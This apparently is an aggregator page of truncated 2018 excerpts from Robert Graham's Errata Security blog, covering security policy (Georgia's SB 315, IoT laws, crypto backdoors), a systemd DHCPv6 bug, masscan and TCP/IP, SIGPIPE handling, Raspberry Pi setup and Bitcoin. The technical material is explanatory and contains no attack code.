ErrataRob.webp 2018-11-04 18:22:46 Brian Kemp is bad on cybersecurity (lien direct) I'd prefer a Republican governor, but as a cybersecurity expert, I have to point out how bad Brian Kemp (candidate for Georgia governor) is on cybersecurity. When notified about vulnerabilities in election systems, his response has been to shoot the messenger rather than fix the vulnerabilities. This was the premise behind the cybercrime bill earlier this year that was ultimately vetoed by the current governor after vocal opposition from cybersecurity companies. More recently, he just announced that he's investigating the Georgia State Democratic Party for a "failed hacking attempt".According to news stories, state elections websites are full of common vulnerabilities, those documented by the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed, as allowing a hacker to cancel registrations of those of the other party.Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to test are insecure. This concept is the basis for many policy initiatives at the federal level, to not only protect researchers probing for weaknesses from prosecution, but to even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this.But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315 that criminalized this activity of merely attempting to access a computer without permission, to probe for possibly vulnerabilities. To the ignorant and backwards person, this seems reasonable, of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only outlaws your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election meddling hackers are not deterred by such laws, only Georgia residents concerned whether their government websites are secure.It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month you have your Windows desktop or iPhone nagging you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities.It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems).Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fix them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. 10 years ago, such activity wasn't safe.The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not supp Vulnerability Threat Guideline
ErrataRob.webp 2018-10-27 07:28:06 Systemd is bad parsing and should feel bad (lien direct) Systemd has a remotely exploitable bug in it's DHCPv6 client. That means anybody on the local network can send you a packet and take control of your computer. The flaw is a typical buffer-overflow. Several news stories have pointed out that this client was written from scratch, as if that were the moral failing, instead of reusing existing code. That's not the problem.The problem is that it was written from scratch without taking advantage of the lessons of the past. It makes the same mistakes all over again.In the late 1990s and early 2000s, we learned that parsing input is a problem. The traditional ad hoc approach you were taught in school is wrong. It's wrong from an abstract theoretical point of view. It's wrong from the practical point of view, error prone and leading to spaghetti code.The first thing you need to unlearn is byte-swapping. I know that this was some sort epiphany you had when you learned network programming but byte-swapping is wrong. If you find yourself using a macro to swap bytes, like the be16toh() macro used in this code, then you are doing it wrong.But, you say, the network byte-order is big-endian, while today's Intel and ARM processors are little-endian. So you have to swap bytes, don't you?No. As proof of the matter I point to every other language other than C/C++. They don't don't swap bytes. Their internal integer format is undefined. Indeed, something like JavaScript may be storing numbers as a floating points. You can't muck around with the internal format of their integers even if you wanted to.An example of byte swapping in the code is something like this:In this code, it's taking a buffer of raw bytes from the DHCPv6 packet and "casting" it as a C internal structure. The packet contains a two-byte big-endian length field, "option->len", which the code must byte-swap in order to use.Among the errors here is casting an internal structure over external data. From an abstract theory point of view, this is wrong. Internal structures are undefined. Just because you can sort of know the definition in C/C++ doesn't change the fact that they are still undefined.From a practical point of view, this leads to confusion, as the programmer is never quite clear as to the boundary between external and internal data. You are supposed to rigorously verify external data, because the hacker controls it. You don't keep double-checking and second-guessing internal data, because that would be stupid. When you blur the lines between internal and external data, then your checks get muddled up.Yes you can, in C/C++, cast an internal structure over external data. But just because you can doesn't mean you should. What you should do instead is parse data the same way as if you were writing code in JavaScript. For example, to grab the DHCP6 option length field, you should write something like: Guideline
ErrataRob.webp 2018-10-23 20:03:42 Masscan as a lesson in TCP/IP (lien direct) When learning TCP/IP it may be helpful to look at the masscan port scanning program, because it contains its own network stack. This concept, "contains its own network stack", is so unusual that it'll help resolve some confusion you might have about networking. It'll help challenge some (incorrect) assumptions you may have developed about how networks work.For example, here is a screenshot of running masscan to scan a single target from my laptop computer. My machine has an IP address of 10.255.28.209, but masscan runs with an address of 10.255.28.250. This works fine, with the program contacting the target computer and downloading information -- even though it has the 'wrong' IP address. That's because it isn't using the network stack of the notebook computer, and hence, not using the notebook's IP address. Instead, it has its own network stack and its own IP address.At this point, it might be useful to describe what masscan is doing here. It's a "port scanner", a tool that connects to many computers and many ports to figure out which ones are open. In some cases, it can probe further: once it connects to a port, it can grab banners and version information.In the above example, the parameters to masscan used here are:-p80 : probe for port "80", which is the well-known port assigned for web-services using the HTTP protocol--banners : do a "banner check", grabbing simple information from the target depending on the protocol. In this case, it grabs the "title" field from the HTML from the server, and also grabs the HTTP headers. It does different banners for other protocols.--source-ip 10.255.28.250 : this configures the IP address that masscan will use172.217.197.113 : the target to be scanned. This happens to be a Google server, by the way, though that's not really important.Now let's change the IP address that masscan is using to something completely different, like 1.2.3.4. The difference from the above screenshot is that we no longer get any data in response. Why is that? Guideline
ErrataRob.webp 2018-10-21 18:10:54 TCP/IP, Sockets, and SIGPIPE (lien direct) There is a spectre haunting the Internet -- the spectre of SIGPIPE errors. It's a bug in the original design of Unix networking from 1981 that is perpetuated by college textbooks, which teach students to ignore it. As a consequence, sometimes software unexpectedly crashes. This is particularly acute on industrial and medical networks, where security professionals can't run port/security scans for fear of crashing critical devices.An example of why this bug persists is the well-known college textbook "Unix Network Programming" by Richard Stevens. In section 5.13, he correctly describes the problem.When a process writes to a socket that has received an RST, the SIGPIPE signal is sent to the process. The default action of this signal is to terminate the process, so the process must catch the signal to avoid being involuntarily terminated.This description is accurate. The "Sockets" network APIs was based on the "pipes" interprocess communication when TCP/IP was first added to the Unix operating system back in 1981. This made it straightforward and comprehensible to the programmers at the time. This SIGPIPE behavior made sense when piping the output of one program to another program on the command-line, as is typical under Unix: if the receiver of the data crashes, then you want the sender of the data to also stop running. But it's not the behavior you want for networking. Server processes need to continue running even if a client crashes.But Steven's description is insufficient. It portrays this problem as optional, that only exists if the other side of the connection is misbehaving. He never mentions the problem outside this section, and none of his example code handles the problem. Thus, if you base your code on Steven's, it'll inherit this problem and sometimes crash.The simplest solution is to configure the program to ignore the signal, such as putting the following line of code in your main() function:   signal(SIGPIPE, SIG_IGN);If you search popular projects, you'll find that this there solution most of the time, such as openssl.But there is a problem with this approach, as OpenSSL demonstrates: it's both a command-line program and a library. The command-line program handles this error, but the library doesn't. This means that using the SSL_write() function to send encrypted data may encounter this error. Nowhere in the OpenSSL documentation does it mention that the user of the library needs to handle this.Ideally, library writers would like to deal with the problem internally. There are platform-specific ways to deal with this. On Linux, an additional parameter MSG_NOSIGNAL can be added to the send() function. On BSD (including macOS), setsockopt(SO_NOSIGPIPE) can be configured for the socket when it's created (after socket() or after accept()). On Windows and some other operating systems, the SIGPIPE isn't even generated, so nothing needs to be done for those platforms.But it's difficult. Browsing through cross platform projects like curl, which tries this library technique, I see the following bit:#ifdef __SYMBIAN32__/* This isn't actually supported under Symbian OS */#undef SO_NOSIGPIPE Guideline
ErrataRob.webp 2018-10-19 19:24:46 Election interference from Uber and Lyft (lien direct) Almost nothing can escape the taint of election interference. A good example is the announcements by Uber and Lyft that they'll provide free rides to the polls on election day. This well-meaning gesture nonetheless calls into question how this might influence the election."Free rides" to the polls is a common thing. Taxi companies have long offered such services for people in general. Political groups have long offered such services for their constituencies in particular. Political groups target retirement communities to get them to the polls, black churches have long had their "Souls to the Polls" program across the 37 states that allow early voting on Sundays.But with Uber and Lyft getting into this we now have concerns about "big data", "algorithms", and "hacking".As the various Facebook controversies have taught us, these companies have a lot of data on us that can reliably predict how we are going to vote. If their leaders wanted to, these companies could use this information in order to get those on one side of an issue to the polls. On hotly contested elections, it wouldn't take much to swing the result to one side.Even if they don't do this consciously, their various algorithms (often based on machine learning and AI) may do so accidentally. As is frequently demonstrated, unconscious biases can lead to real world consequences, like facial recognition systems being unable to read Asian faces.Lastly, it makes these companies prime targets for Russian hackers, who may take all these into account when trying to muck with elections. Or indeed, to simply claim that they did in order to call the results into question. Though to be fair, Russian hackers have so many other targets of opportunity. Messing with the traffic lights of a few cities would be enough to swing a presidential election, specifically targeting areas with certain voters with traffic jams making it difficult for them to get to the polls.Even if it's not "hackers" as such, many will want to game the system. For example, politically motivated drivers may choose to loiter in neighborhoods strongly on one side or the other, helping the right sorts of people vote at the expense of not helping the wrong people. Likewise, drivers might skew the numbers by deliberately hailing rides out of opposing neighborhoods and taking them them out of town, or to the right sorts of neighborhoods.I'm trying to figure out which Party this benefits the most. Let's take a look at rider demographics to start with, such as this post. It appears that income levels and gender are roughly evenly distributed.Ridership is skewed urban, with riders being 46% urban, 48% suburban, and 6% rural. In contrast, US population is 31% urban, 55% suburban, and 15% rural. Giving the increasing polarization among rural and urban voters, this strongly skews results in favor of Democrats.Likewise, the above numbers show that Uber ridership is strongly skewed to the younger generation, with 55% of the riders 34 and younger. This again strongly skews "free rides" by Uber and Lyft toward the Democrats. Though to be fair, the "over 65" crowd has long had an advantage as the parties have fallen over themselves to bus people from retirement communities to the polls (and that older people can get free time on weekdays to vote).Even if you are on the side that appears to benefit, this should still concern you. Our allegiance should first be to a robust and fa Guideline Uber
ErrataRob.webp 2018-10-14 04:57:46 How to irregular cyber warfare (lien direct) Somebody (@thegrugq) pointed me to this article on "Lessons on Irregular Cyber Warfare", citing the masters like Sun Tzu, von Clausewitz, Mao, Che, and the usual characters. It tries to answer:...as an insurgent, which is in a weaker power position vis-a-vis a stronger nation state; how does cyber warfare plays an integral part in the irregular cyber conflicts in the twenty-first century between nation-states and violent non-state actors or insurgenciesI thought I'd write a rebuttal.None of these people provide any value. If you want to figure out cyber insurgency, then you want to focus on the technical "cyber" aspects, not "insurgency". I regularly read military articles about cyber written by those, like in the above article, which demonstrate little experience in cyber.The chief technical lesson for the cyber insurgent is the Birthday Paradox. Let's say, hypothetically, you go to a party with 23 people total. What's the chance that any two people at the party have the same birthday? The answer is 50.7%. With a party of 75 people, the chance rises to 99.9% that two will have the same birthday.The paradox is that your intuitive way of calculating the odds is wrong. You are thinking the odds are like those of somebody having the same birthday as yourself, which is in indeed roughly 23 out of 365. But we aren't talking about you vs. the remainder of the party, we are talking about any possible combination of two people. This dramatically changes how we do the math.In cryptography, this is known as the "Birthday Attack". One crypto task is to uniquely fingerprint documents. Historically, the most popular way of doing his was with an algorithm known as "MD5" which produces 128-bit fingerprints. Given a document, with an MD5 fingerprint, it's impossible to create a second document with the same fingerprint. However, with MD5, it's possible to create two documents with the same fingerprint. In other words, we can't modify only one document to get a match, but we can keep modifying two documents until their fingerprints match. Like a room, finding somebody with your birthday is hard, finding any two people with the same birthday is easier.The same principle works with insurgencies. Accomplishing one specific goal is hard, but accomplishing any goal is easy. Trying to do a narrowly defined task to disrupt the enemy is hard, but it's easy to support a group of motivated hackers and let them do any sort of disruption they can come up with.The above article suggests a means of using cyber to disrupt a carrier attack group. This is an example of something hard, a narrowly defined attack that is unlikely to actually work in the real world.Conversely, consider the attacks attributed to North Korea, like those against Sony or the Wannacry virus. These aren't the careful planning of a small state actor trying to accomplish specific goals. These are the actions of an actor that supports hacker groups, and lets them loose without a lot of oversight and direction. Wannacry in particular is an example of an undirected cyber attack. We know from our experience with network worms that its effects were impossible to predict. Somebody just stuck the newly discovered NSA EternalBlue payload into an existing virus framework and let it run to see what happens. As we worm experts know, nobody could have predicted the results of doing so, not even its creators.Another example is the DNC election hacks. The reason we can attribute them to Russia is because it wasn't their narrow goal. Instead, by looking at things like their URL shortener, we can see that they flailed around broadly all over cyberspace. The DNC was just one of thei Hack Guideline Wannacry
ErrataRob.webp 2018-09-10 17:33:17 California\'s bad IoT law (lien direct) California has passed an IoT security bill, awaiting the government's signature/veto. It's a typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little improve security, while doing a lot to impose costs and harm innovation.It's based on the misconception of adding security features. It's like dieting, where people insist you should eat more kale, which does little to address the problem you are pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add “security features” but to remove “insecure features”. For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical “magic pill” or “silver bullet” thinking that we spend much of our time in infosec fighting against.We don't want arbitrary features like firewall and anti-virus added to these products. It'll just increase the attack surface making things worse. The one possible exception to this is “patchability”: some IoT devices can't be patched, and that is a problem. But even here, it's complicated. Even if IoT devices are patchable in theory there is no guarantee vendors will supply such patches, or worse, that users will apply them. Users overwhelmingly forget about devices once they are installed. These devices aren't like phones/laptops which notify users about patching.You might think a good solution to this is automated patching, but only if you ignore history. Many rate “NotPetya” as the worst, most costly, cyberattack ever. That was launched by subverting an automated patch. Most IoT devices exist behind firewalls, and are thus very difficult to hack. Automated patching gets beyond firewalls; it makes it much more likely mass infections will result from hackers targeting the vendor. The Mirai worm infected fewer than 200,000 devices. A hack of a tiny IoT vendor can gain control of more devices than that in one fell swoop.The bill does target one insecure feature that should be removed: hardcoded passwords. But they get the language wrong. A device doesn't have a single password, but many things that may or may not be called passwords. A typical IoT device has one system for creating accounts on the web management interface, a wholly separate authentication system for services like Telnet (based on /etc/passwd), and yet a wholly separate system for things like debugging interfaces. Just because a device does the proscribed thing of using a unique or user generated password in the user interface doesn't mean it doesn't also have a bug in Telnet.That was the problem with devices infected by Mirai. The description that these were hardcoded passwords is only a superficial understanding of the problem. The real problem was that there were different authentication systems in the web interface and in other services like Telnet. Most of the devices vulnerable to Mirai did the right thing on the web interfaces (meeting the language of this law) requiring the user to create new passwords before operating. They just did the wrong thing elsewhere.People aren't really paying attention to what happened with Mirai. They look at the 20 billion new IoT devices that are going to be connected to the Internet by 2020 and believe Mirai is just the tip of the iceberg. But it isn't. The IPv4 Internet has only 4 billion addresses, which are pretty much already used up. This means those 20 billion won't be exposed to the public Internet like Mirai devices, but hidden behind firewalls that translate addresses. Thus, rather than Mirai presaging the future, it represents the last gasp of the past that is unlikely to come again.This law is backwards looking rather than forward looking. Forward looking, by far the most important t Hack Threat Patching Guideline NotPetya Tesla
ErrataRob.webp 2018-08-27 01:56:09 Provisioning a headless Raspberry Pi (lien direct) The typical way of installing a fresh Raspberry Pi is to attach power, keyboard, mouse, and an HDMI monitor. This is a pain, especially for the diminutive RPi Zero. This blogpost describes a number of options for doing headless setup. There are several options for this, including Ethernet, Ethernet gadget, WiFi, and serial connection. These examples use a Macbook as an example, maybe I'll get around to a blogpost describing this from Windows.Burning micro SD cardWe are going to edit the SD card before booting, so for completeness, I thought I'd describe the process of burning an SD card.We are going to download the latest "raspbian" operating system. I download the "lite" version because I'm not using the desktop features. It comes as a compressed .zip file which we need to extract into an .img file. Just double-click on the .zip on Windows or Mac.The next step is to burn the image to an SD card. On Windows I use Win32DiskImager. On Mac I use the following command-line steps:$ sudo -s# mount# diskutil unmount /dev/disk2s1# dd bs=1m if=~/Downloads/2018-06-27-raspbian-stretch-lite.img of=/dev/disk2 conv=syncFirst, I need a root prompt. I then use the mount command to find out where the micro SD card is mounted in the file system. It's usually /dev/disk2s1, but could be disk3 or disk4 depending upon other things that may already be mounted on my Mac, such as USB drives or dmg files. It's important to know the correct drive because the dd utility is unforgiving of mistakes and can wipe out your entire drive. For gosh's sake, don't use disk1!!!! Remember dd stands for danger-danger (well, many claim it stands for disk-dump, but seriously, it's dangerous).The next step is to unmount the drive. Instead of the Unix umount utility use the diskutil unmount macOS tool.Now we use good ol' dd to copy the image over. The above example is my recently download raspbian image that's two months old. When you do this, it'll be a newer version with a different file name, so look in your ~/Downloads folder for the correct name.This takes a while to write to the SD card. You can type [ctrl-T] to see progress if you want.When we are done writing, don't eject the card. We are going to edit the contents as described below before we stick it into our Raspberry Pi. After running dd, it's going to become automatically mounted on your Mac, on mine it comes up as /Volumes/boot. When I say "root directory of the SD card" in the instructions below, I mean that directory.Troubleshooting: If you get the "Resource busy" error when running dd, it means you didn't unmount the drive. Go back and run diskutil unmount /dev/disk2s1 (or equivalent for whatever mount tell you which drive the SD card is using).You can use the "raw" disk instead of normal disk, such as /dev/rdisk2. I don't know what the tradeoffs are.EthernetThe RPi B comes with Ethernet built-in Guideline
ErrataRob.webp 2018-08-20 16:06:46 DeGrasse Tyson: Make Truth Great Again (lien direct) Neil deGrasse Tyson tweets the following:I'm okay with a US Space Force. But what we need most is a Truth Force - one that defends against all enemies of accurate information, both foreign & domestic.- Neil deGrasse Tyson (@neiltyson) August 20, 2018When people make comparisons with Orwell's "Ministry of Truth", he obtusely persists:A good start:  The National Academy of Sciences, which “…provides objective, science-based advice on critical issues affecting the nation."- Neil deGrasse Tyson (@neiltyson) August 20, 2018Given that Orwellian dystopias were the theme of this summer's DEF CON hacker conference, let's explore what's wrong with this idea.Truth vs. "Truth"I work in a corrupted industry, variously known as the "infosec" community or "cybersecurity" industry. It's a great example of how truth is corrupted into "Truth".At a recent government policy meeting, I pointed out how vendors often downplay the risk of bugs (vulnerabilities that can be exploited by hackers). When vendors are notified of these bugs and release a patch to fix them, they often give a risk rating. These ratings are often too low, in order to protect the corporate reputation. The representative from Oracle claimed that they didn't do that, and that indeed, they'll often overestimate the risk. Other vendors chimed in, also claiming they rated the risk higher than it really was.In a neutral world, deliberately overestimating the risk would be the same falsehood as deliberately underestimating it. But we live in a non-neutral world, where only one side is a lie, the middle is truth, and the other side is "Truth". Lying in the name of the "Truth" is somehow acceptable.Moreover, Oracle is famous for having downplayed the risk of significant bugs in the past, and is well-known in the industry as being the least trustworthy vendor as far as security of their products is concerned. Much of their policy efforts in Washington D.C. are focused on preventing their dirty laundry from being exposed. They aren't simply another vendor promoting "Truth", but a deliberately exploiting "Truth" to corrupt ends.That we should exaggerate the risks of cybersecurity, deliberately lie to people for their own good, is the uncontroversial consensus of our infosec/cybersec community. Most do it, few think this is wrong. Security is a moral imperative that justifies "Truth".The National Academy of ScientistsSo are we getting the truth or "Truth" from organizations like the National Academy of Scientists?The question here isn't global warming. That mankind's carbon emissions warms the climate is truth. We have a good understanding of how greenhouse gases work, as well as many measures of the climate showing that warming is occurring. The Arctic is steadily losing ice each summer.Instead, the question is "Global Warming", the claims made by politicians on the subject. Do politicians on the left fairly represent the truth, or are they the "Truth"?Which side is the National Academy of Sciences on? Are they committed to the truth, or (like the infosec/cybersec community) are they pursuing "Truth"? Is global warming a moral imperative that justifies playing loose with the facts?Googling "national academy of sciences climate chang Guideline APT 32
ErrataRob.webp 2018-07-12 19:54:20 Your IoT security concerns are stupid (lien direct) Lots of government people are focused on IoT security, such as this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question.Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small, but manageable constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet that was launched by subverting an automated patch of accounting software.Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, it's primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching.Such technical analysis of events like Mirai and notPetya are ignored. Policymakers are only cherrypicking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com shipped directly from Shenzen now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100-billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4-billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.Lastly, focusing on the ven Hack Patching Guideline NotPetya
ErrataRob.webp 2018-05-23 14:39:01 C is too low level (lien direct) I'm in danger of contradicting myself, after previously pointing out that x86 machine code is a high-level language, but this article claiming C is a not a low level language is bunk. C certainly has some problems, but it's still the closest language to assembly. This is obvious by the fact it's still the fastest compiled language. What we see is a typical academic out of touch with the real world.The author makes the (wrong) observation that we've been stuck emulating the PDP-11 for the past 40 years. C was written for the PDP-11, and since then CPUs have been designed to make C run faster. The author imagines a different world, such as where CPU designers instead target something like LISP as their preferred language, or Erlang. This misunderstands the state of the market. CPUs do indeed supports lots of different abstractions, and C has evolved to accommodate this.The author criticizes things like "out-of-order" execution which has lead to the Spectre sidechannel vulnerabilities. Out-of-order execution is necessary to make C run faster. The author claims instead that those resources should be spent on having more slower CPUs, with more threads. This sacrifices single-threaded performance in exchange for a lot more threads executing in parallel. The author cites Sparc Tx CPUs as his ideal processor.But here's the thing, the Sparc Tx was a failure. To be fair, it's mostly a failure because most of the time, people wanted to run old C code instead of new Erlang code. But it was still a failure at running Erlang.Time after time, engineers keep finding that "out-of-order", single-threaded performance is still the winner. A good example is ARM processors for both mobile phones and servers. All the theory points to in-order CPUs as being better, but all the products are out-of-order, because this theory is wrong. The custom ARM cores from Apple and Qualcomm used in most high-end phones are so deeply out-of-order they give Intel CPUs competition. The same is true on the server front with the latest Qualcomm Centriq and Cavium ThunderX2 processors, deeply out of order supporting more than 100 instructions in flight.The Cavium is especially telling. Its ThunderX CPU had 48 simple cores which was replaced with the ThunderX2 having 32 complex, deeply out-of-order cores. The performance increase was massive, even on multithread-friendly workloads. Every competitor to Intel's dominance in the server space has learned the lesson from Sparc Tx: many wimpy cores is a failure, you need fewer beefy cores. Yes, they don't need to be as beefy as Intel's processors, but they need to be close.Even Intel's "Xeon Phi" custom chip learned this lesson. This is their GPU-like chip, running 60 cores with 512-bit wide "vector" (sic) instructions, designed for supercomputer applications. Its first version was purely in-order. Its current version is slightly out-of-order. It supports four threads and focuses on basic number crunching, so in-order cores seems to be the right approach, but Intel found in this case that out-of-order processing still provided a benefit. Practice is different than theory.As an academic, the author of the above article focuses on abstractions. The criticism of C is that it has the wrong abstractions which are hard to optimize, and that if we instead expressed things in the right abstractions, it would be easier to optimize.This is an intellectually compelling argument, but so far bunk.The reason is that while the theoretical base language has issues, everyone programs using extensions to the language, like "intrinsics" (C 'functions' that map to assembly instructions). Programmers write libraries using these intrinsics, which then the rest of the normal programmers use. In other words, if your criticism is that C is not itself low level enou Guideline
ErrataRob.webp 2018-04-25 16:46:42 No, Ray Ozzie hasn\'t solved crypto backdoors (lien direct) According to this Wired article, Ray Ozzie may have a solution to the crypto backdoor problem. No, he hasn't. He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors, we just don't know how to secure them.The vault doesn't scaleYes, Apple has a vault where they've successfully protected important keys. No, it doesn't mean this vault scales. The more people and the more often you have to touch the vault, the less secure it becomes. We are talking thousands of requests per day from 100,000 different law enforcement agencies around the world. We are unlikely to protect this against incompetence and mistakes. We are definitely unable to secure this against deliberate attack.A good analogy to Ozzie's solution is LetsEncrypt for getting SSL certificates for your website, which is fairly scalable, using a private key locked in a vault for signing hundreds of thousands of certificates. That this scales seems to validate Ozzie's proposal.But at the same time, LetsEncrypt is easily subverted. LetsEncrypt uses DNS to verify your identity. But spoofing DNS is easy, as was recently shown in the recent BGP attack against a cryptocurrency. Attackers can create fraudulent SSL certificates with enough effort. We've got other protections against this, such as discovering and revoking the SSL bad certificate, so while damaging, it's not catastrophic.But with Ozzie's scheme, equivalent attacks would be catastrophic, as it would lead to unlocking the phone and stealing all of somebody's secrets.In particular, consider what would happen if LetsEncrypt's certificate was stolen (as Matthew Green points out). The consequence is that this would be detected and mass revocations would occur. If Ozzie's master key were stolen, nothing would happen. Nobody would know, and evildoers would be able to freely decrypt phones. Ozzie claims his scheme can work because SSL works -- but then his scheme includes none of the many protections necessary to make SSL work.What I'm trying to show here is that in a lab, it all looks nice and pretty, but when attacked at scale, things break down -- quickly. We have so much experience with failure at scale that we can judge Ozzie's scheme as woefully incomplete. It's not even up to the standard of SSL, and we have a long list of SSL problems.Cryptography is about people more than mathWe have a mathematically pure encryption algorithm called the "One Time Pad". It can't ever be broken, provably so with mathematics.It's also perfectly useless, as it's not something humans can use. That's why we use AES, which is vastly less secure (anything you encrypt today can probably be decrypted in 100 years). AES can be used by humans whereas One Time Pads cannot be. (I learned the fallacy of One Time Pad's on my grandfather's knee -- he was a WW II codebreaker who broke German messages trying to futz with One Time Pads).The same is true with Ozzie's scheme. It focuses on the mathematical model but ignores the human element. We already know how to solve the mathematical problem in a hundred different ways. The part we don't know how to secure it the human element.How do we know the law enforcement person is who they say they are? How do we know the "trusted Apple employee" can't be bribed? How can the law enforcement agent communicate securely with the Apple employee?You think these things are theoretical, but they aren't. Consider financial transactions. It used to be common that you could just email your bank/broker to wire funds into an account for such things as buying a house. Hackers have subverted that, intercepting messages, changing account numbers, Guideline
ErrataRob.webp 2018-04-16 07:42:52 My letter urging Georgia governor to veto anti-hacking bill (lien direct) February 16, 2018Office of the Governor206 Washington Street111 State CapitolAtlanta, Georgia 30334Re: SB 315Dear Governor Deal:I am writing to urge you to veto SB315, the "Unauthorized Computer Access" bill.The cybersecurity community, of which Georgia is a leader, is nearly unanimous that SB315 will make cybersecurity worse. You've undoubtedly heard from many of us opposing this bill. It does not help in prosecuting foreign hackers who target Georgian computers, such as our elections systems. Instead, it prevents those who notice security flaws from pointing them out, thereby getting them fixed. This law violates the well-known Kirchhoff's Principle, that instead of secrecy and obscurity, that security is achieved through transparency and openness.That the bill contains this flaw is no accident. The justification for this bill comes from an incident where a security researcher noticed a Georgia state election system had made voter information public. This remained unfixed, months after the vulnerability was first disclosed, leaving the data exposed. Those in charge decided that it was better to prosecute those responsible for discovering the flaw rather than punish those who failed to secure Georgia voter information, hence this law.Too many security experts oppose this bill for it to go forward. Signing this bill, one that is weak on cybersecurity by favoring political cover-up over the consensus of the cybersecurity community, will be part of your legacy. I urge you instead to veto this bill, commanding the legislature to write a better one, this time consulting experts, which due to Georgia's thriving cybersecurity community, we do not lack.Thank you for your attention.Sincerely,Robert Graham(formerly) Chief Scientist, Internet Security Systems Guideline
ErrataRob.webp 2018-03-12 05:46:00 What John Oliver gets wrong about Bitcoin (lien direct) John Oliver covered bitcoin/cryptocurrencies last night. I thought I'd describe a bunch of things he gets wrong.How Bitcoin worksNowhere in the show does it describe what Bitcoin is and how it works.Discussions should always start with Satoshi Nakamoto's original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you decrypt it with your secret key and encrypt it with mine, handing ownership over to me with no third party involved that can reverse the transaction, and essentially no overhead.All the rest of the stuff, like the decentralized blockchain and mining, is all about making that work.Bitcoin crazies forget about the original genesis of Bitcoin. For example, they talk about adding features to stop fraud, reversing transactions, and having a central authority that manages that. This misses the point, because the existing electronic banking system already does that, and does a better job at it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the "DAO", which did exactly that -- and collapsed in a big fraudulent scheme where insiders made money and outsiders didn't.Sticking to Satoshi's original ideas are a lot better than trying to repeat how the crazy fringe activists define Bitcoin.How does any money have value?Oliver's answer is currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000.This is wrong. A better way of asking the question why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called "inflation", as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things.The reason the value of the dollar changes is largely because the Federal Reserve manages the supply of dollars, though the same law of Supply and Demand. As you know, if a supply decreases (like oil), then the price goes up, or if the supply of something increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing it to be worth more. Conversely, if prices fall (or don't rise fast enough), the Fed increases supply, so that the dollar is worth less.The reason money follows the law of Supply and Demand is because people use money, they consume it like they do other goods and services, like gasoline, tax preparation, food, dance lessons, and so forth. It's not line a fine art painting, a stamp collection or a Beanie Baby -- money is a product. It's just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it's a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call Guideline
